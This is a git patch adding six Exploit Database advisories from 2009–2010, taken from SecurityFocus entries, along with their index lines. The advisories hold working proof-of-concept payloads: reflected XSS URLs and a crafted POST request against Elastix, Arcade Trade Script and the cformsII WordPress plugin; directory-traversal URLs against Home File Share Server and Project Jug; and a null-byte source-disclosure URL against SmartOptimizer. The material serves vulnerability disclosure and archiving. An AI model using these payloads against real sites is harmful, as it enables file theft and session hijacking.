From 68d833b397282d32498eae08fd2f660c4aeec931 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 14 Oct 2014 04:50:20 +0000
Subject: [PATCH] Updated 10_14_2014

---
 files.csv                           |  6 +++
 platforms/multiple/remote/34945.txt |  9 +++++
 platforms/php/webapps/34941.txt     |  9 +++++
 platforms/php/webapps/34942.txt     | 21 ++++++++++
 platforms/php/webapps/34944.txt     |  9 +++++
 platforms/php/webapps/34946.txt     | 59 +++++++++++++++++++++++++++++
 platforms/windows/remote/34943.txt  |  9 +++++
 7 files changed, 122 insertions(+)
 create mode 100755 platforms/multiple/remote/34945.txt
 create mode 100755 platforms/php/webapps/34941.txt
 create mode 100755 platforms/php/webapps/34942.txt
 create mode 100755 platforms/php/webapps/34944.txt
 create mode 100755 platforms/php/webapps/34946.txt
 create mode 100755 platforms/windows/remote/34943.txt

diff --git a/files.csv b/files.csv
index dcc265309..eb673757a 100755
--- a/files.csv
+++ b/files.csv
@@ -31462,3 +31462,9 @@ id,file,description,date,author,platform,type,port
 34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 Memory Corruption Vulnerability",2010-10-28,"Jokaim and nSense",windows,dos,0
 34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 Local File Include and Cross Site Scripting Vulnerabilities",2010-10-27,MustLive,php,webapps,0
 34940,platforms/php/webapps/34940.txt,"212cafe WebBoard 2.90 beta 'view.php' Directory Traversal Vulnerability",2009-05-29,MrDoug,php,webapps,0
+34941,platforms/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 'q' Parameter Cross Site Scripting Vulnerability",2009-05-25,SmOk3,php,webapps,0
+34942,platforms/php/webapps/34942.txt,"Elastix 2.0.2 Multiple Cross Site Scripting Vulnerabilities",2010-11-01,"dave b",php,webapps,0
+34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 Directory Traversal Vulnerability",2010-11-01,"John Leitch",windows,remote,0
+34944,platforms/php/webapps/34944.txt,"SmartOptimizer Null Character Remote Information Disclosure Vulnerability",2010-11-01,"Francois Harvey",php,webapps,0
+34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 Directory Traversal Vulnerability",2010-11-01,"John Leitch",multiple,remote,0
+34946,platforms/php/webapps/34946.txt,"cformsII  11.5/ 13.1 Plugin for WordPress 'lib_ajax.php' Multiple Cross Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0
diff --git a/platforms/multiple/remote/34945.txt b/platforms/multiple/remote/34945.txt
new file mode 100755
index 000000000..4386af4c2
--- /dev/null
+++ b/platforms/multiple/remote/34945.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44580/info
+
+Home File Share Server is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
+
+Home File Share Server 0.7.2.32 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/RealFolder/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F 
\ No newline at end of file
diff --git a/platforms/php/webapps/34941.txt b/platforms/php/webapps/34941.txt
new file mode 100755
index 000000000..54f803efe
--- /dev/null
+++ b/platforms/php/webapps/34941.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44555/info
+
+Arcade Trade Script is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Arcade Trade Script 1.0 beta is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?a=gamelist&q=[XSS]&submit=GO 
\ No newline at end of file
diff --git a/platforms/php/webapps/34942.txt b/platforms/php/webapps/34942.txt
new file mode 100755
index 000000000..c4d8d7f4b
--- /dev/null
+++ b/platforms/php/webapps/34942.txt
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/44565/info
+
+Elastix is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Elastix 2.0.2 is vulnerable; other versions may also be affected. 
+
+https://www.example.com/index.php?menu=packages&nombre_paquete=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&submitInstalado=installed&submit_nombre=Search
+
+https://www.example.com/?menu=pbxconfig&display=recordings&Submit=Go&display=recordings&usersnum=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
+
+https://www.example.com/index.php?menu=cdrreport&date_end=28%20Oct%202010&date_start=28%20Oct%202010&field_name=dst&field_pattern=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&filter=Filter&status=ALL
+
+https://www.example.com/index.php?menu=asterisk_log&filter=2010-10-28&offset=0&busqueda=&ultima_busqueda=&ultimo_offset=&&busqueda=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&filter=2010-10-28&offset=0&show=Show&ultima_busqueda=&ultimo_offset=
+
+https://www.example.com/index.php?menu=summary_by_extension&option_fil=&value_fil=&date_from=28&date_from=28%20Oct%202010&date_to=28%20Oct%202010&option_fil=Ext&show=Show&value_fil=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
+
+https://www.example.com/index.php?menu=grouplist&action=view&id=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
+
+https://www.example.com/index.php?menu=group_permission&filter_group=1&filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E 
\ No newline at end of file
diff --git a/platforms/php/webapps/34944.txt b/platforms/php/webapps/34944.txt
new file mode 100755
index 000000000..f4b469ee4
--- /dev/null
+++ b/platforms/php/webapps/34944.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44578/info
+
+SmartOptimizer is prone to a remote information-disclosure vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view the source code of files in the context of the server process; this may aid in further attacks.
+
+SmartOptimizer 1.7 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/smartoptimizer/index.php?../index.php%00.js 
\ No newline at end of file
diff --git a/platforms/php/webapps/34946.txt b/platforms/php/webapps/34946.txt
new file mode 100755
index 000000000..bc9712020
--- /dev/null
+++ b/platforms/php/webapps/34946.txt
@@ -0,0 +1,59 @@
+source: http://www.securityfocus.com/bid/44587/info
+
+The cformsII plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+cformsII 13.1 is vulnerable; other versions may also be affected. 
+
+    Request:
+
+    http://www.example.com/wp-content/plugins/cforms/lib_ajax.php
+
+    POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
+
+    Host: www.example.com
+
+    User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:
+
+    1.9.2.10) Gecko/20100914 Firefox/3.6.10
+
+    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+    Accept-Language: en-us,en;q=0.5
+
+    Accept-Encoding: gzip,deflate
+
+    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+
+    Keep-Alive: 115
+
+    Connection: keep-alive
+
+    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+    Content-Length: 219
+
+    Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do
+
+    %26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce
+
+    %26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do
+
+    %26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;
+
+    c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t  ;
+
+    comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam
+
+    %40checkpoint.com
+
+    Pragma: no-cache
+
+    Cache-Control: no-cache
+
+    rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#
+
+    $<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http://
+
+    www.checkpoint.com$#$<script>alert(1)</script>
diff --git a/platforms/windows/remote/34943.txt b/platforms/windows/remote/34943.txt
new file mode 100755
index 000000000..61209dd05
--- /dev/null
+++ b/platforms/windows/remote/34943.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/44569/info
+
+Project Jug is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue will allow an attacker to read files outside the webroot directory. Information harvested may aid in launching further attacks.
+
+Project Jug 1.0.0.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/.../.../.../.../.../.../.../.../.../.../windows/win.ini 
\ No newline at end of file